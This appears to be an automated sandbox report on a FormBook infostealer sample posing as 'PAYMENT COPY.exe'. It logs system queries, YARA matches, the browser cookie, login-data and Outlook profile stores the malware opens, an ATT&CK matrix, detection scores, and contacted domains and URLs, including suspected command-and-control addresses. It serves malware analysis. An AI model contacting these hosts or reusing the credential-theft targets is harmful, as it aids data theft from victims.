Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Users\user\Desktop\PAYMENT COPY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\gpresult.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PAYMENT COPY.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
PAYMENT COPY.exe	41%	Virustotal		Browse
PAYMENT COPY.exe	100%	Avira	TR/Kryptik.amknq
PAYMENT COPY.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	100%	Avira	TR/Kryptik.amknq
C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.drednents.es	1%	Virustotal	Browse
www.chooceseafood.ca	0%	Virustotal	Browse
www.pinpointopia.com	0%	Virustotal	Browse
celluslim.com.br	0%	Virustotal	Browse
www.supermontage.com	0%	Virustotal	Browse
zhs.zohosites.com	0%	Virustotal	Browse
www.drdavidglassman.com	0%	Virustotal	Browse
knockdubai.ae	0%	Virustotal	Browse
www.mediciconstanta.ro	0%	Virustotal	Browse
www.topscaleservices.com	0%	Virustotal	Browse
www.celluslim.com.br	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://help.yahoo.com/help/us/ysearch/slurp)	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://www.instagram.com/hover_domains	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.mediciconstanta.ro/jaeg/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.knockdubai.ae/s5gg/	0%	Avira URL Cloud	safe
http://celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA	0%	Avira URL Cloud	safe
http://www.skinut-ves.ru/pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt	100%	Avira URL Cloud	malware
https://www.zoho.com/sites/images/professionally-crafted-themes.png	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.shy-models.ru/spev/?VlEHDVvh=tbEztHv7aRBF16/vS4ReUtdihzrMDj2O7MCPG/vC1Jml0QkKRnSSU8sUdUNE92nxSgZvf0qXlo0KJW6hnlqWydczzuvw5M1cQ8Ki08JizjbM/1/wqRnw39c=&BHPD=o2nt	0%	Avira URL Cloud	safe
http://www.arsenjev.fun/oqq6/	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/images/professionally-crafted-themes.png	0%	Virustotal		Browse
https://tilda.cc	0%	Avira URL Cloud	safe
http://www.mediciconstanta.ro/jaeg/	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
